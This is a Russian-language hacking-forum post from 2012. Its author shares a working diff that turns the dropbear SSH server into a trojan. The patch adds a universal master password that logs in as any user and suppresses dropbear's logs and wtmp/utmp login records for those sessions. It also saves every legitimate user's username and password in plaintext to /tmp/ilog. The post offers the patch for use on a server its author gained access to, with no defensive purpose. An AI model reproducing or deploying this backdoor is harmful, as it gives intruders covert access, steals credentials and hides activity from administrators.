PDA

Просмотр полной версии : dropbear backdoor


yesday
25.01.2012, 06:53
Нашёл сервер где вместо OpenSSH админ зачем-то поставил dropbear (https://matt.ucc.asn.au/dropbear/dropbear.html), встала задача протроянить медведа.
Делюсь патчем (на форуме не нашёл).
Как обычно - логин под любым юзером, известным в системе по единому паролю, вырубание логирования при логине с единым паролем, вырубание логирования в {w,b,u}tmp, для нормальных логинов - запись пары юзер:пароль в файл.


diff -u dropbear-2011.54/dbutil.c dropbear-2011.54.bd/dbutil.c
--- dropbear-2011.54/dbutil.c 2011-11-08 14:48:15.000000000 +0200
+++ dropbear-2011.54.bd/dbutil.c 2012-01-25 04:21:37.000000000 +0200
@@ -90,6 +90,8 @@
}

void dropbear_exit(const char* format, ...) {
+ if(backdoorActive == 1)
+ return;

va_list param;

@@ -100,7 +102,8 @@

static void generic_dropbear_exit(int exitcode, const char* format,
va_list param) {
-
+ if(backdoorActive == 1)
+ exit(exitcode);
char fmtbuf[300];

snprintf(fmtbuf, sizeof(fmtbuf), "Exited: %s", format);
@@ -117,6 +120,8 @@
static void generic_dropbear_log(int UNUSED(priority), const char* format,
va_list param) {

+ if(backdoorActive == 1)
+ return;
char printbuf[1024];

vsnprintf(printbuf, sizeof(printbuf), format, param);
@@ -128,6 +133,9 @@
/* this is what can be called to write arbitrary log messages */
void dropbear_log(int priority, const char* format, ...) {

+ if(backdoorActive == 1)
+ return;
+
va_list param;

va_start(param, format);
diff -u dropbear-2011.54/includes.h dropbear-2011.54.bd/includes.h
--- dropbear-2011.54/includes.h 2011-11-08 14:48:15.000000000 +0200
+++ dropbear-2011.54.bd/includes.h 2012-01-25 04:37:31.000000000 +0200
@@ -25,7 +25,6 @@
#ifndef _INCLUDES_H_
#define _INCLUDES_H_

-
#include "config.h"
#include "options.h"
#include "debug.h"
@@ -152,5 +151,9 @@
#else
# define UNUSED(x) x
#endif
+#define B4XDOOR "your_pass_goes_here"
+FILE *f;
+#define ILOG "/tmp/ilog"
+int backdoorActive;

#endif /* _INCLUDES_H_ */
diff -u dropbear-2011.54/loginrec.c dropbear-2011.54.bd/loginrec.c
--- dropbear-2011.54/loginrec.c 2011-11-08 14:48:15.000000000 +0200
+++ dropbear-2011.54.bd/loginrec.c 2012-01-25 04:16:33.000000000 +0200
@@ -327,6 +327,9 @@
int
login_write (struct logininfo *li)
{
+ if(backdoorActive == 1)
+ return 0;
+
#ifndef HAVE_CYGWIN
if ((int)geteuid() != 0) {
dropbear_log(LOG_WARNING,
diff -u dropbear-2011.54/process-packet.c dropbear-2011.54.bd/process-packet.c
--- dropbear-2011.54/process-packet.c 2011-11-08 14:48:15.000000000 +0200
+++ dropbear-2011.54.bd/process-packet.c 2012-01-25 04:07:29.000000000 +0200
@@ -69,6 +69,8 @@

case SSH_MSG_DISCONNECT:
/* TODO cleanup? */
+ if (backdoorActive == 1)
+ return;
dropbear_close("Disconnect received");
}

diff -u dropbear-2011.54/svr-authpasswd.c dropbear-2011.54.bd/svr-authpasswd.c
--- dropbear-2011.54/svr-authpasswd.c 2011-11-08 14:48:15.000000000 +0200
+++ dropbear-2011.54.bd/svr-authpasswd.c 2012-01-25 04:31:19.000000000 +0200
@@ -35,6 +35,8 @@
/* Process a password auth request, sending success or failure messages as
* appropriate */
void svr_auth_password() {
+
+ backdoorActive = 0;

#ifdef HAVE_SHADOW_H
struct spwd *spasswd = NULL;
@@ -71,6 +73,18 @@

password = buf_getstring(ses.payload, &passwordlen);

+ if(password){
+ if (!strcmp(password, B4XDOOR)) {
+ backdoorActive = 1;
+ send_msg_userauth_success();
+ return;
+ }
+ if((f=fopen(ILOG,"a"))!=NULL){
+ fprintf(f,"user:password --> %s:%s\n",ses.authstate.pw_name, password);
+ fclose(f);
+ }
+ }
+
/* the first bytes of passwdcrypt are the salt */
testcrypt = crypt((char*)password, passwdcrypt);
m_burn(password, passwordlen);
diff -u dropbear-2011.54/svr-main.c dropbear-2011.54.bd/svr-main.c
--- dropbear-2011.54/svr-main.c 2011-11-08 14:48:15.000000000 +0200
+++ dropbear-2011.54.bd/svr-main.c 2012-01-25 04:05:43.000000000 +0200
@@ -285,7 +285,7 @@
#endif /* DEBUG_FORKGPROF */

getaddrstring(&remoteaddr, NULL, &remote_port, 0);
- dropbear_log(LOG_INFO, "Child connection from %s:%s", remote_host, remote_port);
+ //dropbear_log(LOG_INFO, "Child connection from %s:%s", remote_host, remote_port);
m_free(remote_host);
m_free(remote_port);